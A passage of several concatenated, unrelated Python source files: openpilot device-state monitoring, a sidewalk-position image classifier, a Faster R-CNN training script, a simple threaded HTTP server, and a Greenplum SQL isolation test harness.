if not model.startswith("Samsung SSD 980") and params.get("Offroad_BadNvme") is None:
set_offroad_alert_if_changed("Offroad_BadNvme", True)
cloudlog.event("Unsupported NVMe", model=model, error=True)
except Exception:
pass
# Handle offroad/onroad transition
should_start = all(onroad_conditions.values())
if started_ts is None:
should_start = should_start and all(startup_conditions.values())
if should_start != should_start_prev or (count == 0):
params.put_bool("IsOnroad", should_start)
params.put_bool("IsOffroad", not should_start)
params.put_bool("IsEngaged", False)
engaged_prev = False
HARDWARE.set_power_save(not should_start)
if sm.updated['controlsState']:
engaged = sm['controlsState'].enabled
if engaged != engaged_prev:
params.put_bool("IsEngaged", engaged)
engaged_prev = engaged
try:
with open('/dev/kmsg', 'w') as kmsg:
kmsg.write(f"<3>[thermald] engaged: {engaged}\n")
except Exception:
pass
if should_start:
off_ts = None
if started_ts is None:
started_ts = sec_since_boot()
started_seen = True
else:
if onroad_conditions["ignition"] and (startup_conditions != startup_conditions_prev):
cloudlog.event("Startup blocked", startup_conditions=startup_conditions, onroad_conditions=onroad_conditions)
started_ts = None
if off_ts is None:
off_ts = sec_since_boot()
prebuiltlet = params.get_bool("PutPrebuilt")
if not os.path.isfile(prebuiltfile) and prebuiltlet:
os.system("cd /data/openpilot; touch prebuilt")
elif os.path.isfile(prebuiltfile) and not prebuiltlet:
os.system("cd /data/openpilot; rm -f prebuilt")
# Offroad power monitoring
power_monitor.calculate(peripheralState, onroad_conditions["ignition"])
msg.deviceState.offroadPowerUsageUwh = power_monitor.get_power_used()
msg.deviceState.carBatteryCapacityUwh = max(0, power_monitor.get_car_battery_capacity())
current_power_draw = HARDWARE.get_current_power_draw() # pylint: disable=assignment-from-none
if current_power_draw is not None:
statlog.sample("power_draw", current_power_draw)
msg.deviceState.powerDrawW = current_power_draw
else:
msg.deviceState.powerDrawW = 0
# Check if we need to disable charging (handled by boardd)
msg.deviceState.chargingDisabled = power_monitor.should_disable_charging(onroad_conditions["ignition"], in_car, off_ts)
# Check if we need to shut down
if power_monitor.should_shutdown(peripheralState, onroad_conditions["ignition"], in_car, off_ts, started_seen):
cloudlog.warning(f"shutting device down, offroad since {off_ts}")
params.put_bool("DoShutdown", True)
msg.deviceState.chargingError = current_filter.x > 0. and msg.deviceState.batteryPercent < 90 # if current is positive, then battery is being discharged
msg.deviceState.started = started_ts is not None
msg.deviceState.startedMonoTime = int(1e9*(started_ts or 0))
last_ping = params.get("LastAthenaPingTime")
if last_ping is not None:
msg.deviceState.lastAthenaPingTime = int(last_ping)
msg.deviceState.thermalStatus = thermal_status
pm.send("deviceState", msg)
if EON and not is_uno:
set_offroad_alert_if_changed("Offroad_ChargeDisabled", (not usb_power))
should_start_prev = should_start
startup_conditions_prev = startup_conditions.copy()
# Log to statsd
statlog.gauge("free_space_percent", msg.deviceState.freeSpacePercent)
statlog.gauge("gpu_usage_percent", msg.deviceState.gpuUsagePercent)
statlog.gauge("memory_usage_percent", msg.deviceState.memoryUsagePercent)
for i, usage in enumerate(msg.deviceState.cpuUsagePercent):
statlog.gauge(f"cpu{i}_usage_percent", usage)
for i, temp in enumerate(msg.deviceState.cpuTempC):
statlog.gauge(f"cpu{i}_temperature", temp)
for i, temp in enumerate(msg.deviceState.gpuTempC):
statlog.gauge(f"gpu{i}_temperature", temp)
statlog.gauge("memory_temperature", msg.deviceState.memoryTempC)
statlog.gauge("ambient_temperature", msg.deviceState.ambientTempC)
for i, temp in enumerate(msg.deviceState.pmicTempC):
statlog.gauge(f"pmic{i}_temperature", temp)
for i, temp in enumerate(last_hw_state.nvme_temps):
statlog.gauge(f"nvme_temperature{i}", temp)
for i, temp in enumerate(last_hw_state.modem_temps):
statlog.gauge(f"modem_temperature{i}", temp)
statlog.gauge("fan_speed_percent_desired", msg.deviceState.fanSpeedPercentDesired)
statlog.gauge("screen_brightness_percent", msg.deviceState.screenBrightnessPercent)
# report to server once every 10 minutes
if (count % int(600. / DT_TRML)) == 0:
if EON and started_ts is None and msg.deviceState.memoryUsagePercent > 40:
cloudlog.event("High offroad memory usage", mem=msg.deviceState.memoryUsagePercent)
cloudlog.event("STATUS_PACKET",
count=count,
pandaStates=[strip_deprecated_keys(p.to_dict()) for p in pandaStates],
peripheralState=strip_deprecated_keys(peripheralState.to_dict()),
location=(strip_deprecated_keys(sm["gpsLocationExternal"].to_dict()) if sm.alive["gpsLocationExternal"] else None),
deviceState=strip_deprecated_keys(msg.to_dict()))
count += 1
def main():
hw_queue = queue.Queue(maxsize=1)
end_event = threading.Event()
threads = [
threading.Thread(target=hw_state_thread, args=(end_event, hw_queue)),
threading.Thread(target=thermald_thread, args=(end_event, hw_queue)),
]
for t in threads:
t.start()
try:
while True:
time.sleep(1)
if not all(t.is_alive() for t in threads):
break
finally:
end_event.set()
for t in threads:
t.join()
if __name__ == "__main__":
main()
|
shift_classification.py
|
import cv2
import threading
import tensorflow as tf
import numpy as np
import capturer
from utils.circularBuffer import CircularBuffer
classes = ['Left of Sidewalk', 'Middle of Sidewalk', 'Right of Sidewalk', 'Nothing Detected']
model_path = "./shift_classification/shift_classification_model_vgg16_final.h5"
readings_buffer_size = 50
image_preprocessing_dimens = (100, 100)
detection_threshold = 0.5
class SidewalkClassification:
def __init__(self):
self.model = tf.keras.models.load_model(model_path)
self.readings_buffer = CircularBuffer(readings_buffer_size, noneOverridePercent=0.5)
self.images_queue = CircularBuffer(1)
self.classifier_queue = CircularBuffer(1)
threading.Thread(target=self.classification_starter).start()
def capture_processing(self):
while True:
try:
frame = capturer.get_images().get_last()
if frame is not None:
preprocessed_frame = cv2.resize(frame, image_preprocessing_dimens, interpolation=cv2.INTER_LINEAR)
self.images_queue.add(np.expand_dims(preprocessed_frame, 0))
except Exception as e:
print("Capturing Not Working", e)
def classification_starter(self):
threading.Thread(target=self.capture_processing).start()
while True:
try:
self.perform_inference(self.images_queue.get_last())
except Exception as e:
print("Classification Not Working", e)
def perform_inference(self, image):
feedforward_result = self.model.predict(image).tolist()[0]
        self.readings_buffer.add(None if feedforward_result is None or max(feedforward_result) < detection_threshold else feedforward_result)
averaged_result = self.readings_buffer.mean()
self.classifier_queue.add(classes[len(classes) - 1] if averaged_result is None else classes[np.argmax(averaged_result)])
def get_inference(self):
return self.classifier_queue.get_last()
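# Usage sketch (illustrative, not part of the original module): the constructor
# starts the classification loop in a background thread, so a caller only needs
# to poll get_inference() for the latest smoothed label. This assumes capturer
# is already supplying frames via capturer.get_images().
#
#   classifier = SidewalkClassification()
#   while True:
#       label = classifier.get_inference()  # one of `classes` (may be None before the first result)
#       if label is not None:
#           print(label)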
|
train_pascal.py
|
#!/usr/bin/env python
# --------------------------------------------------------
# Faster R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick
# --------------------------------------------------------
"""Train a Faster R-CNN network using alternating optimization.
This tool implements the alternating optimization algorithm described in our
NIPS 2015 paper ("Faster R-CNN: Towards Real-time Object Detection with Region
Proposal Networks." Shaoqing Ren, Kaiming He, Ross Girshick, Jian Sun.)
"""
import _init_paths
from fast_rcnn.train import get_training_roidb, train_net
from fast_rcnn.config import cfg, cfg_from_file, cfg_from_list, get_output_dir
from datasets.factory import get_imdb
from rpn.generate import imdb_proposals
import argparse
import pprint
import numpy as np
import sys, os
import multiprocessing as mp
import cPickle
import shutil
def parse_args():
"""
Parse input arguments
"""
parser = argparse.ArgumentParser(description='Train a Faster R-CNN network')
parser.add_argument('--gpu', dest='gpu_id',
help='GPU device id to use [0]',
default=0, type=int)
parser.add_argument('--net_name', dest='net_name',
help='network name (e.g., "ZF")',
default=None, type=str)
parser.add_argument('--weights', dest='pretrained_model',
help='initialize with pretrained model weights',
default=None, type=str)
parser.add_argument('--cfg', dest='cfg_file',
help='optional config file',
default=None, type=str)
parser.add_argument('--imdb', dest='imdb_name',
help='dataset to train on',
default='voc_2007_trainval', type=str)
parser.add_argument('--set', dest='set_cfgs',
help='set config keys', default=None,
nargs=argparse.REMAINDER)
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
return args
def get_roidb(imdb_name, rpn_file=None):
imdb = get_imdb(imdb_name)
print 'Loaded dataset `{:s}` for training'.format(imdb.name)
imdb.set_proposal_method(cfg.TRAIN.PROPOSAL_METHOD)
print 'Set proposal method: {:s}'.format(cfg.TRAIN.PROPOSAL_METHOD)
if rpn_file is not None:
imdb.config['rpn_file'] = rpn_file
roidb = get_training_roidb(imdb)
return roidb, imdb
def get_solvers(net_name):
# Faster R-CNN Alternating Optimization
n = 'dense33net'
#d = 'pascal_voc'
# Solver for each training stage
solvers = [[net_name, n, 'solver.prototxt']]
solvers = [os.path.join(cfg.MODELS_DIR, *s) for s in solvers]
# Iterations for each training stage
max_iters = [500000]
# max_iters = [100, 100, 100, 100]
# Test prototxt for the RPN
rpn_test_prototxt = os.path.join(
cfg.MODELS_DIR, net_name, n, 'test_densenet.prototxt')
return solvers, max_iters, rpn_test_prototxt
# ------------------------------------------------------------------------------
# Pycaffe doesn't reliably free GPU memory when instantiated nets are discarded
# (e.g. "del net" in Python code). To work around this issue, each training
# stage is executed in a separate process using multiprocessing.Process.
# ------------------------------------------------------------------------------
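# Illustrative sketch (not part of the original script) of the pattern used at the
# bottom of this file: run one training stage per process and pass results back
# through a multiprocessing queue, so pycaffe's GPU memory is released when the
# process exits. The helper name below is hypothetical.
#
#   def _run_stage(target, **kwargs):
#       q = mp.Queue()
#       p = mp.Process(target=target, kwargs=dict(queue=q, **kwargs))
#       p.start()
#       result = q.get()   # e.g. {'model_path': ...} or {'proposal_path': ...}
#       p.join()           # process exit frees the GPU memory held by pycaffe
#       return result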
def _init_caffe(cfg):
"""Initialize pycaffe in a training process.
"""
import caffe
# fix the random seeds (numpy and caffe) for reproducibility
np.random.seed(cfg.RNG_SEED)
caffe.set_random_seed(cfg.RNG_SEED)
# set up caffe
if cfg.GPU_ID < 0:
caffe.set_mode_cpu()
else:
caffe.set_mode_gpu()
caffe.set_device(cfg.GPU_ID)
def train_rpn(queue=None, imdb_name=None, init_model=None, solver=None,
max_iters=None, cfg=None):
"""Train a Region Proposal Network in a separate training process.
"""
# Not using any proposals, just ground-truth boxes
cfg.TRAIN.HAS_RPN = True
cfg.TRAIN.BBOX_REG = False # applies only to Fast R-CNN bbox regression
cfg.TRAIN.PROPOSAL_METHOD = 'gt'
cfg.TRAIN.IMS_PER_BATCH = 1
print 'Init model: {}'.format(init_model)
print('Using config:')
pprint.pprint(cfg)
import caffe
_init_caffe(cfg)
roidb, imdb = get_roidb(imdb_name)
print 'roidb len: {}'.format(len(roidb))
output_dir = get_output_dir(imdb)
print 'Output will be saved to `{:s}`'.format(output_dir)
model_paths = train_net(solver, roidb, output_dir,
pretrained_model=init_model,
max_iters=max_iters)
# Cleanup all but the final model
for i in model_paths[:-1]:
os.remove(i)
rpn_model_path = model_paths[-1]
# Send final model path through the multiprocessing queue
queue.put({'model_path': rpn_model_path})
def rpn_generate(queue=None, imdb_name=None, rpn_model_path=None, cfg=None,
rpn_test_prototxt=None):
"""Use a trained RPN to generate proposals.
"""
cfg.TEST.RPN_PRE_NMS_TOP_N = -1 # no pre NMS filtering
cfg.TEST.RPN_POST_NMS_TOP_N = 2000 # limit top boxes after NMS
print 'RPN model: {}'.format(rpn_model_path)
print('Using config:')
pprint.pprint(cfg)
import caffe
_init_caffe(cfg)
# NOTE: the matlab implementation computes proposals on flipped images, too.
# We compute them on the image once and then flip the already computed
# proposals. This might cause a minor loss in mAP (less proposal jittering).
imdb = get_imdb(imdb_name)
print 'Loaded dataset `{:s}` for proposal generation'.format(imdb.name)
# Load RPN and configure output directory
rpn_net = caffe.Net(rpn_test_prototxt, rpn_model_path, caffe.TEST)
output_dir = get_output_dir(imdb)
print 'Output will be saved to `{:s}`'.format(output_dir)
# Generate proposals on the imdb
rpn_proposals = imdb_proposals(rpn_net, imdb)
# Write proposals to disk and send the proposal file path through the
# multiprocessing queue
rpn_net_name = os.path.splitext(os.path.basename(rpn_model_path))[0]
rpn_proposals_path = os.path.join(
output_dir, rpn_net_name + '_proposals.pkl')
with open(rpn_proposals_path, 'wb') as f:
cPickle.dump(rpn_proposals, f, cPickle.HIGHEST_PROTOCOL)
print 'Wrote RPN proposals to {}'.format(rpn_proposals_path)
queue.put({'proposal_path': rpn_proposals_path})
def train_fast_rcnn(queue=None, imdb_name=None, init_model=None, solver=None,
max_iters=None, cfg=None, rpn_file=None):
"""Train a Fast R-CNN using proposals generated by an RPN.
"""
    cfg.TRAIN.HAS_RPN = False  # not generating proposals on-the-fly
cfg.TRAIN.PROPOSAL_METHOD = 'rpn' # use pre-computed RPN proposals instead
cfg.TRAIN.IMS_PER_BATCH = 2
print 'Init model: {}'.format(init_model)
print 'RPN proposals: {}'.format(rpn_file)
print('Using config:')
pprint.pprint(cfg)
import caffe
_init_caffe(cfg)
roidb, imdb = get_roidb(imdb_name, rpn_file=rpn_file)
output_dir = get_output_dir(imdb)
print 'Output will be saved to `{:s}`'.format(output_dir)
# Train Fast R-CNN
model_paths = train_net(solver, roidb, output_dir,
pretrained_model=init_model,
max_iters=max_iters)
# Cleanup all but the final model
for i in model_paths[:-1]:
os.remove(i)
fast_rcnn_model_path = model_paths[-1]
# Send Fast R-CNN model path over the multiprocessing queue
queue.put({'model_path': fast_rcnn_model_path})
if __name__ == '__main__':
args = parse_args()
print('Called with args:')
print(args)
if args.cfg_file is not None:
cfg_from_file(args.cfg_file)
if args.set_cfgs is not None:
cfg_from_list(args.set_cfgs)
cfg.GPU_ID = args.gpu_id
# --------------------------------------------------------------------------
# Pycaffe doesn't reliably free GPU memory when instantiated nets are
# discarded (e.g. "del net" in Python code). To work around this issue, each
# training stage is executed in a separate process using
# multiprocessing.Process.
# --------------------------------------------------------------------------
# queue for communicated results between processes
mp_queue = mp.Queue()
# solves, iters, etc. for each training stage
solvers, max_iters, rpn_test_prototxt = get_solvers(args.net_name)
cfg.TRAIN.SNAPSHOT_INFIX = 'stage1'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
init_model=args.pretrained_model,
solver=solvers[0],
max_iters=max_iters[0],
cfg=cfg)
p = mp.Process(target=train_rpn, kwargs=mp_kwargs)
p.start()
rpn_stage1_out = mp_queue.get()
p.join()
|
router.py
|
#!/usr/bin/env python3
"""
Basic HTTP server (main driver).
Processes all incoming and outgoing HTTP Requests/Responses
Creates a new thread for every request and handles it
Calls appropriate RequestParser.py and Responder.py objects
"""
import socket
import threading
import sys, os
from RequestParser import RequestParser
from Responder import Responder
class Server():
def __init__(self, ip, port):
"""Initializes our server and binds to a socket."""
self.host = ip
self.port = port
self.sock = socket.socket()
        # SO_REUSEADDR lets the socket be rebound to the same address right after a restart
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.bind((self.host, self.port))
print("Bounded on {}:{}".format(self.host, self.port))
def listen(self):
"""Listens for incoming connections and threads them off."""
self.sock.listen(5) # queue up to 5 clients
# server runs infinitely and threads off each incoming connection
while True:
client, address = self.sock.accept()
client.settimeout(30) # times out if client inactive for 30 seconds
threading.Thread(target = self.serveClient, args = (client,address)).start()
def recvall(self, client):
"""A helper function to receive ALL client data before proceeding."""
BUFF_SIZE = 512
data = b''
while True:
part = client.recv(BUFF_SIZE)
data += part
if len(part) < BUFF_SIZE:
                # fewer bytes than requested: the peer closed the connection (0 bytes) or this chunk ends the request
break
return data
def serveClient(self, client, address):
"""Receives request, parses it, responds, and closes connection."""
name = "{}:{}".format(address[0], address[1])
print("Connected to", name)
while True:
try:
data = self.recvall(client)
if data:
request = RequestParser(data) # initialize RequestParser object
request.parseRequest() # parse the request
response = Responder(request, client, name)
# call the appropriate Responder function based on status code
if request.error_code != 200:
response.sendError(request.error_code)
elif request.action == 'GET':
response.sendGET()
elif request.action == 'POST':
response.sendPOST()
# close the connection once the client has been served
# and exit the thread
print('Served {}, disconnecting.'.format(name))
client.close()
return False
else:
raise Exception('Client {} disconnected'.format(name))
except Exception as e:
print(e)
client.close()
return False # need to return to safely exit the thread
if __name__ == "__main__":
ip = '127.0.0.1' # localhost
port = 8888 # our default port
server = Server(ip, port)
server.listen()
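# Quick manual check (illustrative): with the server running on 127.0.0.1:8888,
# a request such as
#   curl -v http://127.0.0.1:8888/
# should be parsed by RequestParser and answered by Responder.sendGET(), while a
# malformed request (error_code != 200) is answered via Responder.sendError().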
|
sql_isolation_testcase.py
|
"""
Copyright (c) 2004-Present Pivotal Software, Inc.
This program and the accompanying materials are made available under
the terms of the under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from mpp.models import SQLTestCase
import pygresql.pg
from tinctest.lib import Gpdiff
import os
import subprocess
import re
import multiprocessing
import time
import sys
import socket
import tinctest
class SQLIsolationExecutor(object):
def __init__(self, dbname=''):
self.processes = {}
# The re.S flag makes the "." in the regex match newlines.
# When matched against a command in process_command(), all
# lines in the command are matched and sent as SQL query.
self.command_pattern = re.compile(r"^(\d+)([&\\<\\>Uq]?)\:(.*)", re.S)
if dbname:
self.dbname = dbname
else:
self.dbname = os.environ.get('PGDATABASE')
class SQLConnection(object):
def __init__(self, out_file, name, utility_mode, dbname):
self.name = name
self.utility_mode = utility_mode
self.out_file = out_file
self.dbname = dbname
parent_conn, child_conn = multiprocessing.Pipe(True)
self.p = multiprocessing.Process(target=self.session_process, args=(child_conn,))
self.pipe = parent_conn
self.has_open = False
self.p.start()
self.out_file = out_file
def session_process(self, pipe):
sp = SQLIsolationExecutor.SQLSessionProcess(self.name,
self.utility_mode, self.out_file.name, pipe, self.dbname)
sp.do()
def query(self, command):
print >>self.out_file
self.out_file.flush()
if len(command.strip()) == 0:
return
if self.has_open:
raise Exception("Cannot query command while waiting for results")
self.pipe.send((command, False))
r = self.pipe.recv()
if r is None:
raise Exception("Execution failed")
print >>self.out_file, r.strip()
def fork(self, command, blocking):
print >>self.out_file, " <waiting ...>"
self.pipe.send((command, True))
if blocking:
time.sleep(0.2)
if self.pipe.poll(0):
raise Exception("Forked command is not blocking")
self.has_open = True
def join(self):
print >>self.out_file, " <... completed>"
r = self.pipe.recv()
if r is None:
raise Exception("Execution failed")
print >>self.out_file, r.strip()
self.has_open = False
def stop(self):
self.pipe.send(("", False))
self.p.join()
if self.has_open:
raise Exception("Should not finish test case while waiting for results")
def quit(self):
print >>self.out_file, "... <quitting>"
self.stop()
def terminate(self):
self.pipe.close()
self.p.terminate()
class SQLSessionProcess(object):
def __init__(self, name, utility_mode, output_file, pipe, dbname):
"""
Constructor
"""
self.name = name
self.utility_mode = utility_mode
self.pipe = pipe
self.dbname = dbname
if self.utility_mode:
(hostname, port) = self.get_utility_mode_port(name)
self.con = pygresql.pg.connect(host=hostname,
port=port,
opt="-c gp_session_role=utility",
dbname=self.dbname)
else:
self.con = pygresql.pg.connect(dbname=self.dbname)
self.filename = "%s.%s" % (output_file, os.getpid())
def get_utility_mode_port(self, name):
"""
Gets the port number/hostname combination of the
dbid with the id = name
"""
con = pygresql.pg.connect(port = int(os.environ.get("PGPORT", 5432)))
r = con.query("SELECT hostname, port FROM gp_segment_configuration WHERE dbid = %s" % name).getresult()
if len(r) == 0:
raise Exception("Invalid dbid %s" % name)
if r[0][0] == socket.gethostname():
return (None, int(r[0][1]))
return (r[0][0], int(r[0][1]))
def printout_result(self, r):
"""
            This is pretty dirty, but apparently the only way
            to get the pretty output of the query result.
            For some Python-internal reason, print(r) calls the
            correct formatting code while neither str(r) nor
            repr(r) outputs anything useful.
"""
with open(self.filename, "w") as f:
print >>f, r,
f.flush()
with open(self.filename, "r") as f:
ppr = f.read()
return ppr.strip() + "\n"
def execute_command(self, command):
"""
Executes a given command
"""
try:
r = self.con.query(command)
if r and type(r) == str:
echo_content = command[:-1].partition(" ")[0].upper()
return "%s %s" % (echo_content, self.printout_result(r))
elif r:
return self.printout_result(r)
else:
echo_content = command[:-1].partition(" ")[0].upper()
return echo_content
except Exception as e:
return str(e)
def do(self):
"""
Process loop.
Ends when the command None is received
"""
(c, wait) = self.pipe.recv()
while c:
if wait:
time.sleep(0.1)
r = self.execute_command(c)
self.pipe.send(r)
r = None
(c, wait) = self.pipe.recv()
if os.path.exists(self.filename):
os.unlink(self.filename)
def get_process(self, out_file, name, utility_mode=False, dbname=""):
"""
Gets or creates the process by the given name
"""
if len(name) > 0 and not name.isdigit():
raise Exception("Name should be a number")
if len(name) > 0 and not utility_mode and int(name) >= 1024:
raise Exception("Session name should be smaller than 1024 unless it is utility mode number")
if not (name, utility_mode) in self.processes:
if not dbname:
dbname = self.dbname
self.processes[(name, utility_mode)] = SQLIsolationExecutor.SQLConnection(out_file, name, utility_mode, dbname)
return self.processes[(name, utility_mode)]
def quit_process(self, out_file, name, utility_mode=False, dbname=""):
"""
Quits a process with the given name
"""
if len(name) > 0 and not name.isdigit():
raise Exception("Name should be a number")
if len(name) > 0 and not utility_mode and int(name) >= 1024:
raise Exception("Session name should be smaller than 1024 unless it is utility mode number")
if not (name, utility_mode) in self.processes:
raise Exception("Sessions not started cannot be quit")
self.processes[(name, utility_mode)].quit()
        del self.processes[(name, utility_mode)]
def process_command(self, command, output_file):
"""
Processes the given command.
The command at this point still includes the isolation behavior
flags, e.g. which session to use.
"""
process_name = ""
sql = command
flag = ""
dbname = ""
m = self.command_pattern.match(command)
if m:
process_name = m.groups()[0]
flag = m.groups()[1]
sql = m.groups()[2]
sql = sql.lstrip()
            # If db_name is specified, it should use the following syntax:
# 1:@db_name <db_name>: <sql>
if sql.startswith('@db_name'):
sql_parts = sql.split(':', 2)
if not len(sql_parts) == 2:
raise Exception("Invalid syntax with dbname, should be of the form 1:@db_name <db_name>: <sql>")
if not sql_parts[0].startswith('@db_name'):
raise Exception("Invalid syntax with dbname, should be of the form 1:@db_name <db_name>: <sql>")
if not len(sql_parts[0].split()) == 2:
raise Exception("Invalid syntax with dbname, should be of the form 1:@db_name <db_name>: <sql>")
dbname = sql_parts[0].split()[1].strip()
if not dbname:
raise Exception("Invalid syntax with dbname, should be of the form 1:@db_name <db_name>: <sql>")
sql = sql_parts[1]
if not flag:
self.get_process(output_file, process_name, dbname=dbname).query(sql.strip())
elif flag == "&":
self.get_process(output_file, process_name, dbname=dbname).fork(sql.strip(), True)
elif flag == ">":
self.get_process(output_file, process_name, dbname=dbname).fork(sql.strip(), False)
elif flag == "<":
if len(sql) > 0:
raise Exception("No query should be given on join")
self.get_process(output_file, process_name, dbname=dbname).join()
elif flag == "U":
self.get_process(output_file, process_name, utility_mode=True, dbname=dbname).query(sql.strip())
elif flag == "q":
if len(sql) > 0:
raise Exception("No query should be given on quit")
self.quit_process(output_file, process_name, dbname=dbname)
else:
raise Exception("Invalid isolation flag")
def process_isolation_file(self, sql_file, output_file):
"""
Processes the given sql file and writes the output
to output file
"""
try:
command = ""
for line in sql_file:
tinctest.logger.info("re.match: %s" %re.match(r"^\d+[q\\<]:$", line))
print >>output_file, line.strip(),
(command_part, dummy, comment) = line.partition("--")
if command_part == "" or command_part == "\n":
print >>output_file
elif command_part.endswith(";\n") or re.match(r"^\d+[q\\<]:$", line):
command += command_part
tinctest.logger.info("Processing command: %s" %command)
self.process_command(command, output_file)
command = ""
else:
command += command_part
for process in self.processes.values():
process.stop()
except:
for process in self.processes.values():
process.terminate()
raise
finally:
for process in self.processes.values():
process.terminate()
# Skipping loading for this model class. Otherwise, by default, whenever this class is imported in sub-classes,
# unittest will load tests for this class as well. If there are sql files in the same folder as the model class,
# the loading mechanism of SQLTestCase will try to construct tests for those sqls which is not intended here.
@tinctest.skipLoading("Model class. This annotation will prevent this class from loading tests when imported in sub-classes")
class SQLIsolationTestCase(SQLTestCase):
"""
The isolation test case allows a fine grained control of interleaved
executing transactions. This is mainly used to test isolation behavior.
An example is:
Execute BEGIN in transaction 1
Execute BEGIN in transaction 2
Execute INSERT in transaction 2
Execute SELECT in transaction 1
Execute COMMIT in transaction 2
Execute SELECT in transaction 1
    The isolation tests are specified identically to sql-scripts in normal
    SQLTestCases. However, it is possible to prefix a SQL line with
    a transaction identifier followed by a colon (":").
The above example would be defined by
1: BEGIN;
2: BEGIN;
2: INSERT INTO a VALUES (1);
1: SELECT * FROM a;
2: COMMIT;
1: SELECT * FROM a;
Blocking behavior can be tested by forking and joining.
1: BEGIN;
2: BEGIN;
1: DELETE FROM foo WHERE a = 4;
2&: DELETE FROM foo WHERE a = 4;
1: COMMIT;
2<:
2: COMMIT;
2& forks the command. It is executed in the background. If the
command is NOT blocking at this point, it is considered an error.
2< joins the background command and outputs the result of the
command execution.
Session ids should be smaller than 1024.
2U: Executes a utility command connected to port 40000.
    One difference from SQLTestCase is the output of INSERT.
    SQLTestCase would output "INSERT 0 1" if one tuple is inserted.
    SQLIsolationTestCase would output "INSERT 1". Because
    SQLIsolationTestCase needs more fine-grained control over
    the execution order than is possible with psql, it uses
    the pygresql python library instead.
Connecting to a specific database:
1. If you specify a db_name metadata in the sql file, connect to that database in all open sessions.
2. If you want a specific session to be connected to a specific database , specify the sql as follows:
1:@db_name testdb: <sql>
2:@db_name test2db: <sql>
1: <sql>
2: <sql>
etc
    Here session 1 will be connected to testdb and session 2 will be connected to test2db. You can specify @db_name only at the beginning of a session. For example, the following would error out:
1:@db_name testdb: <sql>
2:@db_name test2db: <sql>
1: @db_name testdb: <sql>
2: <sql>
etc
Quitting sessions:
By default, all opened sessions will be stopped only at the end of the sql file execution. If you want to explicitly quit a session
    in the middle of the test execution, you can specify the flag 'q' with the session identifier. For example:
1:@db_name testdb: <sql>
2:@db_name test2db: <sql>
1: <sql>
2: <sql>
1q:
2: <sql>
3: <sql>
2q:
3: <sql>
2: @db_name test: <sql>
1q: ---> Will quit the session established with testdb.
2q: ---> Will quit the session established with test2db.
The subsequent 2: @db_name test: <sql> will open a new session with the database test and execute the sql against that session.
"""
def get_ans_suffix(self):
""" The method can be overwritten by a subclass to customize
the ans file behavior.
"""
return
def get_output_substitution(self):
""" The method can be overwritten by a subclass to return a list
of regular expression substitutions the output file should
be tranformed with.
This method can be used to unify an output file to
by remove output that is always different as e.g., an
oid in an error message
"""
return
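    # Illustrative example of overriding get_output_substitution() in a subclass
    # (the pattern below is hypothetical):
    #
    #   def get_output_substitution(self):
    #       return [(r'oid \d+', 'oid <oid>')]
    #
    # _transform_output_file() compiles the first element of each tuple and
    # substitutes it with the second element, line by line.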
def _transform_output_file(self, output_file):
"""
Transforms the output file based on the output
substitutions provided by the subclass.
The transformations are cached and pre-compiled to
reduce the overhead.
"""
if "_output_transforms" not in dir(self):
self._output_transforms = self.get_output_substitution()
            if self._output_transforms is not None:
                self._output_transforms = [(re.compile(t[0]), t[1]) for t in self._output_transforms]
        if self._output_transforms is None or len(self._output_transforms) == 0:
return
contents = ''
with open(output_file, 'r') as f:
contents += f.read()
with open(output_file, "w") as f:
for line in contents.splitlines():
for (p, r) in self._output_transforms:
line2 = p.sub(r, line)
print >>f, line2
def run_sql_file(self, sql_file, out_file = None, out_dir = None, optimizer = None):
"""
        Given a sql file and an ans file, this adds the specified gucs (self.gucs) to the sql file, runs the sql
        against the test case database (self.db_name), and verifies the output against the ans file.
If an 'init_file' exists in the same location as the sql_file, this will be used
while doing gpdiff.
"""
# Add gucs to the test sql and form the actual sql file to be run
if not out_dir:
out_dir = self.get_out_dir()
if not os.path.exists(out_dir):
TINCSystem.make_dirs(out_dir, ignore_exists_error = True)
if optimizer is None:
gucs_sql_file = os.path.join(out_dir, os.path.basename(sql_file))
else:
# sql file will be <basename>_opt.sql or <basename>_planner.sql based on optimizer
gucs_sql_file = os.path.join(out_dir, os.path.basename(sql_file).replace('.sql', '_%s.sql' %self._optimizer_suffix(optimizer)))
self._add_gucs_to_sql_file(sql_file, gucs_sql_file, optimizer)
self.test_artifacts.append(gucs_sql_file)
if not out_file:
if optimizer is None:
out_file = os.path.join(self.get_out_dir(), os.path.basename(sql_file).replace('.sql', '.out'))
else:
# out file will be *_opt.out or *_planner.out based on optimizer
out_file = os.path.join(self.get_out_dir(), os.path.basename(sql_file).replace('.sql', '_%s.out' %self._optimizer_suffix(optimizer)))
self.test_artifacts.append(out_file)
executor = SQLIsolationExecutor(dbname=self.db_name)
with open(out_file, "w") as f:
executor.process_isolation_file(open(sql_file), f)
f.flush()
if out_file[-2:] == '.t':
out_file = out_file[:-2]
return out_file
def verify_out_file(self, out_file, ans_file):
"""
The ans file might be replaced by a customized ans
file.
"""
def check_valid_suffix(suffix):
if not re.match("[a-zA-Z0-9]+", suffix):
raise Exception("Invalid ans file suffix %s" % suffix)
# Modify the ans file based on the suffix
suffix = self.get_ans_suffix()
if suffix:
check_valid_suffix(suffix)
new_ans_file = ans_file[:-4] + "_" + suffix + ".ans"
if os.path.exists(new_ans_file):
tinctest.logger.debug("Using customized ans file %s for this test" %new_ans_file)
ans_file = new_ans_file
if ans_file is not None:
self._transform_output_file(out_file)
self.test_artifacts.append(ans_file)
# Check if an init file exists in the same location as the sql file
init_files = []
init_file_path = os.path.join(self.get_sql_dir(), 'init_file')
if os.path.exists(init_file_path):
init_files.append(init_file_path)
result = Gpdiff.are_files_equal(out_file, ans_file, match_sub = init_files)
if result == False:
self.test_artifacts.append(out_file.replace('.out', '.diff'))
return result
if __name__ == "__main__":
executor = SQLIsolationExecutor()
executor.process_isolation_file(sys.stdin, sys.stdout)
|
util.py
|
# *****************************************************************************
# © Copyright IBM Corp. 2018. All Rights Reserved.
#
# This program and the accompanying materials
# are made available under the terms of the Apache V2.0
